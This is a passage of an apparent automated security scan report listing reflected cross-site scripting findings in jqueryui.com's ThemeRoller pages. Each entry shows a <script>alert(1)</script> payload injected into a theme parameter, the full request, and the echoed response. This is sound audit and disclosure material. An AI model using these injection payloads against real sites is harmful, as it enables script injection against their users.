png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px16d23"><script>alert(1)</script>365c925dcd6&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:57 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="offsetLeftShadow" id="offsetLeftShadow" class="offset" value="-7px16d23\\\"><script>alert(1)</script>365c925dcd6" />
...[SNIP]...

1.174. http://jqueryui.com/themeroller/_rollyourown.php [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c043f"><script>alert(1)</script>91a84df35aa was submitted in the offsetTopShadow parameter. This input was echoed as c043f\\\"><script>alert(1)</script>91a84df35aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7pxc043f"><script>alert(1)</script>91a84df35aa&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:56 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="offsetTopShadow" id="offsetTopShadow" class="offset" value="-7pxc043f\\\"><script>alert(1)</script>91a84df35aa" />
...[SNIP]...

1.175. http://jqueryui.com/themeroller/_rollyourown.php [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 957bd"><script>alert(1)</script>c074e2c4424 was submitted in the opacityOverlay parameter. This input was echoed as 957bd\\\"><script>alert(1)</script>c074e2c4424 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80957bd"><script>alert(1)</script>c074e2c4424&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:50 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="opacityOverlay" id="opacityOverlay" class="opacity" value="80957bd\\\"><script>alert(1)</script>c074e2c4424" />
...[SNIP]...

1.176. http://jqueryui.com/themeroller/_rollyourown.php [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190db"><script>alert(1)</script>8cf468a5797 was submitted in the opacityShadow parameter. This input was echoed as 190db\\\"><script>alert(1)</script>8cf468a5797 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60190db"><script>alert(1)</script>8cf468a5797&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:56 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="opacityShadow" id="opacityShadow" class="opacity" value="60190db\\\"><script>alert(1)</script>8cf468a5797" />
...[SNIP]...

1.177. http://jqueryui.com/themeroller/_rollyourown.php [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b045"><script>alert(1)</script>d2f16d0fa46 was submitted in the thicknessShadow parameter. This input was echoed as 3b045\\\"><script>alert(1)</script>d2f16d0fa46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px3b045"><script>alert(1)</script>d2f16d0fa46&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:56 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="thicknessShadow" id="thicknessShadow" class="offset" value="7px3b045\\\"><script>alert(1)</script>d2f16d0fa46" />
...[SNIP]...

1.178. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorActive request parameter is copied into the HTML document as plain text between tags. The payload 57259<script>alert(1)</script>3ada87c4c0b was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=12121257259<script>alert(1)</script>3ada87c4c0b&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:51 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=12121257259<script>alert(1)</script>3ada87c4c0b&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHig
...[SNIP]...

1.179. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorContent request parameter is copied into the HTML document as plain text between tags. The payload fc267<script>alert(1)</script>1db7ecb42d6 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212fc267<script>alert(1)</script>1db7ecb42d6&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:29 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
